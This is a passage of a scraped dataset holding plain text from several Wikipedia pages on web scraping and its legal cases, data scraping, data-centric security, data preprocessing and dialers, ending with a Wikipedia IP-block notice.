highlighted that such a holding sets a precedent of marginalizing the public good for the prosperity of a single business. 11 13 The case has also brought criticism towards Craigslist for enforcing its exclusive copyright of user-generated content. The critics pointed out that the entire lawsuit depended on a short, one-week-long period where Cragslist's terms of use required that users assign Craigslist the exclusive copyright of any posted content. 12 14 While some users may be happy to have other companies use their classified ads, another reaction was that there may also be users who do not want it. Craigslist would be under similar criticism if it had allowed the sharing and violated these users' privacy expectations. 13 The Electronic Frontier Foundation was critical of the court's decision to uphold Craiglist's copyright claim in their temporary terms of service between July 26, 2012 and August 8, 2012. Stating, "claiming an exclusive license to users' posts to the exclusion of everyone—including the original poster—threatens both innovation and users’ rights, and, even worse, sets terrible precedent. 15 In a related case, in 2017 Craigslist was awarded US 60,56 million in compensation for RadPad s unlawful use of data acquired from 3Taps in 2013. 16 |
412 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-18 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
413 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data-centric_security | Data-centric security is an approach to security that emphasizes the dependability of the data itself rather than the security of networks, servers, or applications. Data-centric security is evolving rapidly as enterprises increasingly rely on digital information to run their business and big data projects become mainstream. 1 2 3 It involves the separation of data and digital rights management that assign encrypted files to pre-defined access control lists, ensuring access rights to critical and confidential data are aligned with documented business needs and job requirements that are attached to user identities. 4 Data-centric security also allows organizations to overcome the disconnect between IT security technology and the objectives of business strategy by relating security services directly to the data they implicitly protect; a relationship that is often obscured by the presentation of security as an end in itself. 5 Common processes in a data-centric security model include: 6 From a technical point of view, information (data) centric security relies on the implementation of the following: 7 Data access control is the selective restriction of access to data. Accessing may mean viewing, editing, or using. Defining proper access controls requires to map out the information, where it resides, how important it is, who it is important to, how sensitive the data is and then designing appropriate controls. 8 Encryption is a proven data-centric technique to address the risk of data theft in smartphones, laptops, desktops and even servers, including the cloud. One limitation is that encryption is not always effective once a network intrusion has occurred and cybercriminals operate with stolen valid user credentials. 9 Data Masking is the process of hiding specific data within a database table or cell to ensure that data security is maintained and that sensitive information is not exposed to unauthorized personnel. This may include masking the data from users, developers, third-party and outsourcing vendors, etc. Data masking can be achieved multiple ways: by duplicating data to eliminate the subset of the data that needs to be hidden, or by obscuring the data dynamically as users perform requests. 10 Monitoring all activity at the data layer is a key component of a data-centric security strategy. It provides visibility into the types of actions that users and tools have requested and been authorized to on specific data elements. Continuous monitoring at the data layer combined with precise access control can contribute significantly to the real-time detection of data breaches, limits the damages inflicted by a breach and can even stop the intrusion if proper controls are in place. A 2016 survey 11 shows that most organizations still do not assess database activity continuously and lack the capability to identify database breaches in a timely fashion. A privacy-enhancing technology (PET) is a method of protecting data. PETs allow online users to protect the privacy of their personally identifiable information (PII) provided to and handled by services or applications. PETs use techniques to minimize possession of personal data without losing the functionality of an information system. Cloud computing is an evolving paradigm with tremendous momentum, but its unique aspects exacerbate security and privacy challenges. Heterogeneity and diversity of cloud services and environments demand fine-grained access control policies and services that should be flexible enough to capture dynamic, context, or attribute-based access requirements and data protection. 12 Data-centric security measures can also help protect against data-leakage and life cycle management of information. 13 |
414 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/File:Screen-Scraping-OCRget.jpg | Screen-Scraping-OCRget.jpg (570 195 pixels, file size: 53 KB, MIME type: image jpeg) Click on a date time to view the file as it appeared at that time. The following other wikis use this file: This file contains additional information, probably added from the digital camera or scanner used to create or digitize it. If the file has been modified from its original state, some details may not fully reflect the modified file. |
415 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-2 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
416 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_format_management | Data format management (DFM) is the application of a systematic approach to the selection and use of the data formats used to encode information for storage on a computer. In practical terms, data format management is the analysis of data formats and their associated technical, legal or economic attributes which can either enhance or detract from the ability of a digital asset or a given information systems to meet specified objectives. Data format management is necessary as the amount of information and number of people creating it grows. This is especially the case as the information with which users are working is difficult to generate, store, costly to acquire, or to be shared. Data format management as an analytic tool or approach is data format neutral. Historically individuals, organization and businesses have been categorized by their type of computer or their operating system. Today, however, it is primarily productivity software, such as spreadsheet or word processor programs, and the way these programs store information that also defines an entity. For instance, when browsing the web it is not important which kind of computer is responsible for hosting a site, only that the information it publishes is in a format that is readable by the viewing browser. In this instance the data format of the published information has more to do with defining compatibilities than the underlying hardware or operating system. Several initiatives have been established to record those data formats commonly used and the software available to read them, for example the Pronom project at the UK National Archives. |
417 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_pre-processing | Data preprocessing can refer to manipulation, filtration or augmentation of data before it is analyzed, 1 and is often an important step in the data mining process. Data collection methods are often loosely controlled, resulting in out-of-range values, impossible data combinations, and missing values, amongst other issues. The preprocessing pipeline used can often have large effects on the conclusions drawn from the downstream analysis. Thus, representation and quality of data is necessary before running any analysis. 2 Often, data preprocessing is the most important phase of a machine learning project, especially in computational biology. 3 If there is a high proportion of irrelevant and redundant information present or noisy and unreliable data, then knowledge discovery during the training phase may be more difficult. Data preparation and filtering steps can take a considerable amount of processing time. Examples of methods used in data preprocessing include cleaning, instance selection, normalization, one-hot encoding, data transformation, feature extraction and feature selection. Data preprocessing allows for the removal of unwanted data with the use of data cleaning, this allows the user to have a dataset to contain more valuable information after the preprocessing stage for data manipulation later in the data mining process. Editing such dataset to either correct data corruption or human error is a crucial step to get accurate quantifiers like true positives, true negatives, false positives and false negatives found in a confusion matrix that are commonly used for a medical diagnosis. Users are able to join data files together and use preprocessing to filter any unnecessary noise from the data which can allow for higher accuracy. Users use Python programming scripts accompanied by the pandas library which gives them the ability to import data from a comma-separated values as a data-frame. The data-frame is then used to manipulate data that can be challenging otherwise to do in Excel. Pandas (software) which is a powerful tool that allows for data analysis and manipulation; which makes data visualizations, statistical operations and much more, a lot easier. Many also use the R programming language to do such tasks as well. The reason why a user transforms existing files into a new one is because of many reasons. Aspects of data preprocessing may include imputing missing values, aggregating numerical quantities and transforming continuous data into categories (data binning). 4 More advanced techniques like principal component analysis and feature selection are working with statistical formulas and are applied to complex datasets which are recorded by GPS trackers and motion capture devices. Semantic data mining is a subset of data mining that specifically seeks to incorporate domain knowledge, such as formal semantics, into the data mining process. Domain knowledge is the knowledge of the environment the data was processed in. Domain knowledge can have a positive influence on many aspects of data mining, such as filtering out redundant or inconsistent data during the preprocessing phase. 5 Domain knowledge also works as constraint. It does this by using working as set of prior knowledge to reduce the space required for searching and acting as a guide to the data. Simply put, semantic preprocessing seeks to filter data using the original environment of said data more correctly and efficiently. There are increasingly complex problems which are asking to be solved by more elaborate techniques to better analyze existing information. fact or opinion? Instead of creating a simple script for aggregating different numerical values into a single value, it make sense to focus on semantic based data preprocessing. 6 The idea is to build a dedicated ontology, which explains on a higher level what the problem is about. 7 In regards to semantic data mining and semantic pre-processing, ontologies are a way to conceptualize and formally define semantic knowledge and data. The Prot g (software) is the standard tool for constructing an ontology. citation needed In general, the use of ontologies bridges the gaps between data, applications, algorithms, and results that occur from semantic mismatches. As a result, semantic data mining combined with ontology has many applications where semantic ambiguity can impact the usefulness and efficiency of data systems. citation needed Applications include the medical field, language processing, banking, 8 and even tutoring, 9 among many more. There are various strengths to using a semantic data mining and ontological based approach. As previously mentioned, these tools can help during the per-processing phase by filtering out non-desirable data from the data set. Additionally, well-structured formal semantics integrated into well designed ontologies can return powerful data that can be easily read and processed by machines. 10 A specifically useful example of this exists in the medical use of semantic data processing. As an example, a patient is having a medical emergency and is being rushed to hospital. The emergency responders are trying to figure out the best medicine to administer to help the patient. Under normal data processing, scouring all the patient’s medical data to ensure they are getting the best treatment could take too long and risk the patients’ health or even life. However, using semantically processed ontologies, the first responders could save the patient’s life. Tools like a semantic reasoner can use ontology to infer the what best medicine to administer to the patient is based on their medical history, such as if they have a certain cancer or other conditions, simply by examining the natural language used in the patient's medical records. 11 This would allow the first responders to quickly and efficiently search for medicine without having worry about the patient’s medical history themselves, as the semantic reasoner would already have analyzed this data and found solutions. In general, this illustrates the incredible strength of using semantic data mining and ontologies. They allow for quicker and more efficient data extraction on the user side, as the user has fewer variables to account for, since the semantically pre-processed data and ontology built for the data have already accounted for many of these variables. However, there are some drawbacks to this approach. Namely, it requires a high amount of computational power and complexity, even with relatively small data sets. 12 This could result in higher costs and increased difficulties in building and maintaining semantic data processing systems. This can be mitigated somewhat if the data set is already well organized and formatted, but even then, the complexity is still higher when compared to standard data processing. tone Below is a simple a diagram combining some of the processes, in particular semantic data mining and their use in ontology. The diagram depicts a data set being broken up into two parts: the characteristics of its domain, or domain knowledge, and then the actual acquired data. The domain characteristics are then processed to become user understood domain knowledge that can be applied to the data. Meanwhile, the data set is processed and stored so that the domain knowledge can applied to it, so that the process may continue. This application forms the ontology. From there, the ontology can be used to analyze data and process results. Fuzzy preprocessing is another, more advanced technique for solving complex problems. Fuzzy preprocessing and fuzzy data mining make use of fuzzy sets. These data sets are composed of two elements: a set and a membership function for the set which comprises 0 and 1. Fuzzy preprocessing uses this fuzzy data set to ground numerical values with linguistic information. Raw data is then transformed into natural language. Ultimately, fuzzy data mining's goal is to help deal with inexact information, such as an incomplete database. Currently fuzzy preprocessing, as well as other fuzzy based data mining techniques see frequent use with neural networks and artificial intelligence. 13 |
418 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Dialer#Fraudulent_dialer | A dialer (American English) or dialler (British English) is an electronic device that is connected to a telephone line to monitor the dialed numbers and alter them to seamlessly provide services that otherwise require lengthy National or International access codes to be dialed. A dialer automatically inserts and modifies the numbers depending on the time of day, country or area code dialed, allowing the user to subscribe to the service providers who offer the best rates. For example, a dialer could be programmed to use one service provider for international calls and another for cellular calls. This process is known as prefix insertion or least cost routing. A line powered dialer does not need any external power but instead takes the power it needs from the telephone line. Another type of dialer is a computer program which creates a connection to the Internet or another computer network over the analog telephone or Integrated Services Digital Network (ISDN). Many operating systems already contain such a program for connections through the Point-to-Point Protocol (PPP), such as WvDial. Many internet service providers offer installation CDs to simplify the process of setting up a proper Internet connection. They either create an entry in the OS's dialer or install a separate dialer (as the AOL software does). In recent years, the term "dialer" often refers specifically to dialers that connect without the user's full knowledge as to cost, with the creator of the dialer intending to commit fraud. call centres use various forms of automatic dialler to place outbound calls to people on contact lists. Dialers are necessary to connect to the internet (at least for non-broadband connections), but some dialers are designed to connect to premium-rate numbers. The providers of such dialers often search for security holes in the operating system installed on the user's computer and use them to set the computer up to dial up through their number, so as to make money from the calls. Alternatively, some dialers inform the user what it is that they are doing, with the promise of special content, accessible only via the special number. Examples of this content include software for download, (usually illegal) trojans posing as MP3s, trojans posing as pornography, or 'underground' programs such as cracks and keygens. The cost of setting up such a service is relatively low, amounting to a few thousand dollars for telecommunications equipment, whereupon the unscrupulous operator will typically take 90% of the cost of a premium rate call, with very few overheads of their own. Users with DSLs (or similar broadband connections) are usually not affected. A dialer can be downloaded and installed, but dialing in is not possible as there are no regular phone numbers in the DSL network and users will not typically have their dial-up modem, if any, connected to a phone line. However, if an ISDN adapter or additional analog modem is installed, the dialer might still be able to get a connection. Malicious dialers can be identified by the following characteristics: citation needed Computers running Microsoft Windows without anti-virus software or proper updates could be vulnerable to Visual Basic-scripts which install a trojan horse which changes values in the Windows Registry and sets Internet Explorer security settings in a way that ActiveX controls can be downloaded from the Internet without warning. After this change is made, when a user accesses a malicious page or email message, it can start installing the dialer. The script also disables the modem speaker and messages that normally come up while dialing into a network. Users of Microsoft Office Outlook, Outlook Express and Internet Explorer are especially affected if running ActiveX controls and JavaScript is allowed and the latest security patches from Microsoft have not been installed. In March 2004, there were malicious dialers that could be installed through fake anti-virus software citation needed . E-mail spam from a so-called "AntiVirus Team" for example, contained download links to programs named "downloadtool.exe" or "antivirus.exe", which are malicious dialers. Other ways of transmission include electronic greeting cards that link to pages that tricks the user to install ActiveX controls, which in turn install dialers in the background. Therefore, links in spam emails should never be opened, automatically started downloads should be canceled as soon as discovered, and one should check on each dial-up to the Internet to see whether the displayed phone number is unchanged. Another way to protect oneself is to disable premium numbers through one's phone services, but of course this disables all such services. One should never run foreign code in a privileged environment unless the source is trustworthy. It is also advisable to protect oneself with anti-malware programs. On 15 August 2003, a new law came into effect in Germany called "Gesetz zur Bek mpfung des Missbrauchs von (0)190er (0)900er Mehrwertdiensterufnummern" ("Law for the combat of misuse of (0)190 (0)900 value added service numbers"). The law contains the following regulations: On 4 March 2004 the German Federal Supreme Court in Karlsruhe decided that fees for the usage of dialers do not have to be paid if it was used without the user's knowledge. |
419 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=2 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by 